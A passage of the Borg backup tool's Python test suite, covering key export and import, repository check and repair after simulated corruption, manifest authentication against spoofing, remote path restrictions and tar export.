self.cmd('init', self.repository_location, '--encryption', 'keyfile')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'r') as fd:
key_contents = fd.read()
assert key_contents == export_contents
os.unlink(key_file)
self.cmd('key', 'import', self.repository_location, export_file)
with open(key_file, 'r') as fd:
key_contents2 = fd.read()
assert key_contents2 == key_contents
def test_key_export_repokey(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
with Repository(self.repository_path) as repository:
repo_key = RepoKey(repository)
repo_key.load(None, Passphrase.env_passphrase())
backup_key = KeyfileKey(key.TestKey.MockRepository())
backup_key.load(export_file, Passphrase.env_passphrase())
assert repo_key.enc_key == backup_key.enc_key
with Repository(self.repository_path) as repository:
repository.save_key(b'')
self.cmd('key', 'import', self.repository_location, export_file)
with Repository(self.repository_path) as repository:
repo_key2 = RepoKey(repository)
repo_key2.load(None, Passphrase.env_passphrase())
assert repo_key2.enc_key == repo_key2.enc_key
def test_key_export_qr(self):
export_file = self.output_path + '/exported.html'
self.cmd('init', self.repository_location, '--encryption', 'repokey')
repo_id = self._extract_repository_id(self.repository_path)
self.cmd('key', 'export', '--qr-html', self.repository_location, export_file)
with open(export_file, 'r', encoding='utf-8') as fd:
export_contents = fd.read()
assert bin_to_hex(repo_id) in export_contents
assert export_contents.startswith('<!doctype html>')
assert export_contents.endswith('</html>')
def test_key_export_directory(self):
export_directory = self.output_path + '/exported'
os.mkdir(export_directory)
self.cmd('init', self.repository_location, '--encryption', 'repokey')
self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
def test_key_import_errors(self):
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
with open(export_file, 'w') as fd:
fd.write('something not a key\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(NotABorgKeyFile):
self.cmd('key', 'import', self.repository_location, export_file)
with open(export_file, 'w') as fd:
fd.write('BORG_KEY a0a0a0\n')
if self.FORK_DEFAULT:
self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
else:
with pytest.raises(RepoIdMismatch):
self.cmd('key', 'import', self.repository_location, export_file)
def test_key_export_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
export_file = self.output_path + '/exported'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
self.cmd('key', 'export', '--paper', self.repository_location, export_file)
with open(export_file, 'r') as fd:
export_contents = fd.read()
assert export_contents == """To restore key use borg key import --paper /path/to/repo
BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
2: 737475 - 88
"""
def test_key_import_paperkey(self):
repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
self.cmd('init', self.repository_location, '--encryption', 'keyfile')
self._set_repository_id(self.repository_path, unhexlify(repo_id))
key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
with open(key_file, 'w') as fd:
fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
typed_input = (
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n' # Forgot to type "-"
b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n' # Forgot to type second "/"
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n' # Typo (..42 not ..41)
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n' # Correct! Congratulations
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'\n\n' # Abort [yN] => N
b'737475 88\n' # missing "-"
b'73747i - 88\n' # typo
b'73747 - 88\n' # missing nibble
b'73 74 75 - 89\n' # line checksum mismatch
b'00a1 - 88\n' # line hash collision - overall hash mismatch, have to start over
b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
b'73 74 75 - 88\n'
)
# In case that this has to change, here is a quick way to find a colliding line hash:
#
# from hashlib import sha256
# hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
# for i in range(1000):
# if hash_fn(i.to_bytes(2, byteorder='big')) == '88': # 88 = line hash
# print(i.to_bytes(2, 'big'))
# break
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
# Test abort paths
typed_input = b'\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-manifest', self.repository_location, dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert 'archives' in result
assert 'config' in result
assert 'item_keys' in result
assert 'timestamp' in result
assert 'version' in result
def test_debug_dump_archive(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
dump_file = self.output_path + '/dump'
output = self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file)
assert output == ""
with open(dump_file, "r") as f:
result = json.load(f)
assert '_name' in result
assert '_manifest_entry' in result
assert '_meta' in result
assert '_items' in result
def test_debug_refcount_obj(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
archive_id = create_json['archive']['id']
output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
# Invalid IDs do not abort or return an error
output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
def test_debug_info(self):
output = self.cmd('debug', 'info')
assert 'CRC implementation' in output
assert 'Python' in output
def test_benchmark_crud(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
def test_config(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('[repository]', output)
self.assert_in('version', output)
self.assert_in('segments_per_dir', output)
self.assert_in('storage_quota', output)
self.assert_in('append_only', output)
self.assert_in('additional_free_space', output)
self.assert_in('id', output)
for cfg_key, cfg_value in [
('additional_free_space', '2G'),
('repository.append_only', '1'),
]:
output = self.cmd('config', self.repository_location, cfg_key)
assert output == '0' + '\n'
self.cmd('config', self.repository_location, cfg_key, cfg_value)
output = self.cmd('config', self.repository_location, cfg_key)
assert output == cfg_value + '\n'
self.cmd('config', '--delete', self.repository_location, cfg_key)
self.cmd('config', self.repository_location, cfg_key, exit_code=1)
self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
@requires_gnutar
def test_export_tar(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--progress')
with changedir('output'):
# This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
# --list's path are those before processing with --strip-components
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
def test_detect_attic_repo(self):
path = make_attic_repo(self.repository_path)
cmds = [
['create', path + '::test', self.tmpdir],
['extract', path + '::test'],
['check', path],
['rename', path + '::test', 'newname'],
['list', path],
['delete', path],
['prune', path],
['info', path + '::test'],
['key', 'export', path, 'exported'],
['key', 'import', path, 'import'],
['key', 'change-passphrase', path],
['break-lock', path],
]
for args in cmds:
output = self.cmd(*args, fork=True, exit_code=2)
assert 'Attic repository detected.' in output
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
EXE = 'borg.exe'
FORK_DEFAULT = True
@unittest.skip('does not raise Exception, but sets rc==2')
def test_init_parent_dirs(self):
pass
@unittest.skip('patches objects')
def test_init_interrupt(self):
pass
@unittest.skip('patches objects')
def test_extract_capabilities(self):
pass
@unittest.skip('patches objects')
def test_extract_xattrs_errors(self):
pass
@unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
def test_basic_functionality(self):
pass
@unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
def test_overwrite(self):
pass
def test_fuse(self):
if fakeroot_detected():
unittest.skip('test_fuse with the binary is not compatible with fakeroot')
else:
super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1')
self.create_src_archive('archive2')
def test_check_usage(self):
output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
self.assert_in('Checking segments', output)
# reset logging to new process default to avoid need for fork=True on next check
logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_not_in('Starting archive consistency check', output)
self.assert_not_in('Checking segments', output)
output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
self.assert_not_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_not_in('archive2', output)
output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
self.assert_in('archive2', output)
def test_missing_file_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
valid_chunks = item.chunks
killed_chunk = valid_chunks[-1]
repository.delete(killed_chunk.id)
break
else:
self.fail('should not happen')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.assert_in('New missing file chunk detected', output)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_in('broken#', output)
# check that the file in the old archives has now a different chunk list without the killed chunk
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_not_equal(valid_chunks, item.chunks)
self.assert_not_in(killed_chunk, item.chunks)
break
else:
self.fail('should not happen')
# do a fresh backup (that will include the killed chunk)
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.create_src_archive('archive3')
# check should be able to heal the file now:
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('Healed previously missing file chunk', output)
self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
# check that the file in the old archives has the correct chunks again
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_equal(valid_chunks, item.chunks)
break
else:
self.fail('should not happen')
# list is also all-healthy again
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_not_in('broken#', output)
def test_missing_archive_item_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.metadata.items[0])
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_archive_metadata(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.id)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(Manifest.MANIFEST_ID)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_corrupted_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_corrupted_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
chunk = repository.get(archive.id)
corrupted_chunk = chunk + b'corrupted!'
repository.put(archive.id, corrupted_chunk)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_duplicate_archive(self):
archive, repository = self.open_archive('archive1')
key = archive.key
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
archive = msgpack.packb({
'cmdline': [],
'items': [],
'hostname': 'foo',
'username': 'bar',
'name': 'archive1',
'time': '2016-12-15T18:49:51.849711',
'version': 1,
})
archive_id = key.id_hash(archive)
repository.put(archive_id, key.encrypt(archive))
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
output = self.cmd('list', self.repository_location)
self.assert_in('archive1', output)
self.assert_in('archive1.1', output)
self.assert_in('archive2', output)
def test_extra_chunks(self):
self.cmd('check', self.repository_location, exit_code=0)
with Repository(self.repository_location, exclusive=True) as repository:
repository.put(b'01234567890123456789012345678901', b'xxxx')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
def _test_verify_data(self, *init_args):
shutil.rmtree(self.repository_path)
self.cmd('init', self.repository_location, *init_args)
self.create_src_archive('archive1')
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
chunk = item.chunks[-1]
data = repository.get(chunk.id) + b'1234'
repository.put(chunk.id, data)
break
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
assert bin_to_hex(chunk.id) + ', integrity error' in output
# repair (heal is tested in another test)
output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
assert bin_to_hex(chunk.id) + ', integrity error' in output
assert 'testsuite/archiver.py: New missing file chunk detected' in output
def test_verify_data(self):
self._test_verify_data('--encryption', 'repokey')
def test_verify_data_unencrypted(self):
self._test_verify_data('--encryption', 'none')
def test_empty_repository(self):
with Repository(self.repository_location, exclusive=True) as repository:
for id_ in repository.list():
repository.delete(id_)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
def test_attic013_acl_bug(self):
# Attic up to release 0.13 contained a bug where every item unintentionally received
# a b'acl'=None key-value pair.
# This bug can still live on in Borg repositories (through borg upgrade).
class Attic013Item:
def as_dict(self):
return {
# These are required
b'path': '1234',
b'mtime': 0,
b'mode': 0,
b'user': b'0',
b'group': b'0',
b'uid': 0,
b'gid': 0,
# acl is the offending key.
b'acl': None,
}
archive, repository = self.open_archive('archive1')
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
archive.items_buffer.add(Attic013Item())
archive.save()
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
def spoof_manifest(self, repository):
with repository:
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'config': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
def test_fresh_init_tam_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
def test_not_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
with repository:
shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
key.tam_required = False
key.change_passphrase(key._passphrase)
manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
del manifest[b'tam']
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
repository.commit(compact=False)
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM not found and not required' in output
# Run upgrade
self.cmd('upgrade', '--tam', self.repository_location)
# Manifest must be authenticated now
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM-verified manifest' in output
# Try to spoof / modify pre-1.0.9
self.spoof_manifest(repository)
# Fails
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
# Force upgrade
self.cmd('upgrade', '--tam', '--force', self.repository_location)
self.cmd('list', self.repository_location)
def test_disable(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
self.cmd('upgrade', '--disable-tam', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
assert not self.cmd('list', self.repository_location)
def test_disable2(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
self.cmd('upgrade', '--disable-tam', self.repository_location)
assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
prefix = '__testsuite__:'
def open_repository(self):
return RemoteRepository(Location(self.repository_location))
def test_remote_repo_restrict_to_path(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
# restricted to repo directory itself, fail for other directories with same prefix:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
# restricted to a completely different path:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
path_prefix = os.path.dirname(self.repository_path)
# restrict to repo directory's parent directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
# restrict to repo directory's parent directory and another directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_3')
def test_remote_repo_restrict_to_repository(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
parent_path = os.path.join(self.repository_path, '..')
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location)
@unittest.skip('only works locally')
def test_debug_put_get_delete_obj(self):
pass
@unittest.skip('only works locally')
def test_config(self):
pass
def test_strip_components_doesnt_leak(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file', contents=b"test file contents 1")
self.create_regular_file('dir/file2', contents=b"test file contents 2")
self.create_regular_file('skipped-file1', contents=b"test file contents 3")
self.create_regular_file('skipped-file2', contents=b"test file contents 4")
self.create_regular_file('skipped-file3', contents=b"test file contents 5")
self.cmd('create', self.repository_location + '::test', 'input')
marker = 'cached responses left in RemoteRepository'
with changedir('output'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
self.assert_true(marker not in res)
with self.assert_creates_file('file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
self.assert_true(marker not in res)
with self.assert_creates_file('dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
self.assert_true(marker not in res)
with self.assert_creates_file('input/dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']
def corrupt(self, file):
with open(file, 'r+b') as fd:
fd.seek(-1, io.SEEK_END)
fd.write(b'1')
def test_cache_chunks(self):
self.corrupt(os.path.join(self.cache_path, 'chunks'))
if self.FORK_DEFAULT:
out = self.cmd('info', self.repository_location, exit_code=2)
assert 'failed integrity check' in out
else:
with pytest.raises(FileIntegrityError):
self.cmd('info', self.repository_location)
def test_cache_files(self):
self.cmd('create', self.repository_location + '::test', 'input')
self.corrupt(os.path.join(self.cache_path, 'files'))
out = self.cmd('create', self.repository_location + '::test1', 'input')
# borg warns about the corrupt files cache, but then continues without files cache.
assert 'files cache is corrupted' in out
def test_chunks_archive(self):
self.cmd('create', self.repository_location + '::test1', 'input')
# Find ID of test1 so we can corrupt it later :)
target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
self.cmd('create', self.repository_location + '::test2', 'input')
# Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('info', self.repository_location, '--json')
chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
assert len(os.listdir(chunks_archive)) == 4 # two archives, one chunks cache and one .integrity file each
self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
# Trigger cache sync by changing the manifest ID in the cache config
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
# Cache sync notices corrupted archive chunks, but automatically recovers.
out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
assert 'Reading cached archive chunk index for test1' in out
assert 'Cached archive chunk index of test1 is corrupted' in out
assert 'Fetching and building archive index for test1' in out
def test_old_version_interfered(self):
# Modify the main manifest ID without touching the manifest ID in the integrity section.
# This happens if a version without integrity checking modifies the cache.
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
out = self.cmd('info', self.repository_location)
assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
# Setup files for the first snapshot
self.create_regular_file('empty', size=0)
self.create_regular_file('file_unchanged', size=128)
self.create_regular_file('file_removed', size=256)
self.create_regular_file('file_removed2', size=512)
self.create_regular_file('file_replaced', size=1024)
os.mkdir('input/dir_replaced_with_file')
os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
os.mkdir('input/dir_removed')
if are_symlinks_supported():
os.mkdir('input/dir_replaced_with_link')
os.symlink('input/dir_replaced_with_file', 'input/link_changed')
os.symlink('input/file_unchanged', 'input/link_removed')
os.symlink('input/file_removed2', 'input/link_target_removed')
os.symlink('input/empty', 'input/link_target_contents_changed')
os.symlink('input/empty', 'input/link_replaced_by_file')
if are_hardlinks_supported():
os.link('input/file_replaced', 'input/hardlink_target_replaced')
os.link('input/empty', 'input/hardlink_contents_changed')
os.link('input/file_removed', 'input/hardlink_removed')
os.link('input/file_removed2', 'input/hardlink_target_removed')
self.cmd('init', '--encryption=repokey', self.repository_location)
# Create the first snapshot
self.cmd('create', self.repository_location + '::test0', 'input')
# Setup files for the second snapshot
self.create_regular_file('file_added', size=2048)
self.create_regular_file('file_empty_added', size=0)
os.unlink('input/file_replaced')
self.create_regular_file('file_replaced', contents=b'0' * 4096)
os.unlink('input/file_removed')
os.unlink('input/file_removed2')
os.rmdir('input/dir_replaced_with_file')
self.create_regular_file('dir_replaced_with_file', size=8192)
os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
os.mkdir('input/dir_added')
os.rmdir('input/dir_removed')
if are_symlinks_supported():
